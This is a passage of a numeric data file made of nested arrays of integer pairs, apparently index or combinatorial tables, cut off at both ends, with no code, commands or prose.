35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 6 , 16],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 16],[ 8 , 20],[ 8 , 21],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 9 , 16],[ 9 , 20],[ 9 , 21],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 17],[ 11 , 20],[ 11 , 23],[ 11 , 24],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 12 , 18],[ 12 , 21],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 6 , 16],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 17],[ 8 , 20],[ 8 , 23],[ 8 , 24],[ 8 , 26],[ 8 , 29],[ 8 , 30],[ 8 , 32],[ 8 , 33],[ 8 , 35],[ 9 , 17],[ 9 , 20],[ 9 , 23],[ 9 , 24],[ 9 , 26],[ 9 , 29],[ 9 , 30],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 18],[ 11 , 21],[ 11 , 23],[ 11 , 25],[ 11 , 27],[ 11 , 29],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 12 , 18],[ 12 , 21],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 
2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 3 , 35],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 
34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 2 , 33],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 
30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 18],[ 10 , 22],[ 10 , 23],[ 10 , 24],[ 10 , 28],[ 10 , 29],[ 10 , 30],[ 10 , 34],[ 10 , 35],[ 10 , 36],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 20],[ 15 , 23],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 21],[ 11 , 25],[ 11 , 26],[ 11 , 27],[ 11 , 31],[ 11 , 32],[ 11 , 33],[ 11 , 37],[ 11 , 38],[ 11 , 39],[ 12 , 21],[ 12 , 25],[ 12 , 26],[ 12 , 27],[ 12 , 31],[ 12 , 32],[ 12 , 33],[ 12 , 37],[ 12 , 38],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 22],[ 14 , 25],[ 14 , 28],[ 14 , 29],[ 14 , 31],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 15 , 22],[ 15 , 25],[ 15 , 28],[ 15 , 
29],[ 15 , 31],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 16 , 22],[ 16 , 25],[ 16 , 28],[ 16 , 29],[ 16 , 31],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 30],[ 19 , 32],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 15],[ 1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 2 , 15],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 3 , 15],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 4 , 15],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 5 , 15],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 25],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 6 , 15],[ 6 , 16],[ 6 , 17],[ 6 , 18],[ 6 , 25],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 7 , 15],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 25],[ 7 , 26],[ 7 , 27],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 16],[ 8 , 19],[ 8 , 22],[ 8 , 23],[ 8 , 25],[ 8 , 28],[ 8 , 29],[ 8 , 31],[ 8 , 32],[ 8 , 34],[ 9 , 16],[ 9 , 19],[ 9 , 22],[ 9 , 23],[ 9 , 25],[ 9 , 28],[ 9 , 29],[ 9 , 31],[ 9 , 32],[ 9 , 34],[ 10 , 16],[ 10 , 19],[ 10 , 22],[ 10 , 23],[ 10 , 25],[ 10 , 28],[ 10 , 29],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 11 , 17],[ 11 , 20],[ 11 , 22],[ 11 , 24],[ 11 , 26],[ 11 , 28],[ 11 , 30],[ 11 , 31],[ 11 , 33],[ 11 , 34],[ 12 , 17],[ 12 , 20],[ 12 , 22],[ 12 , 24],[ 12 , 26],[ 12 , 28],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 13 , 17],[ 13 , 20],[ 13 , 22],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 14 , 18],[ 14 , 21],[ 14 , 23],[ 14 , 24],[ 14 , 27],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 34]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 3 , 35],[ 3 , 36],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 4 , 36],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 25],[ 7 , 26],[ 7 , 27],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 37],[ 7 , 38],[ 7 , 39],[ 8 , 21],[ 8 , 25],[ 8 , 26],[ 8 , 27],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 37],[ 8 , 38],[ 8 , 39],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 22],[ 11 , 25],[ 11 , 28],[ 11 , 29],[ 11 , 31],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 11 , 38],[ 11 , 40],[ 12 , 22],[ 12 , 25],[ 12 , 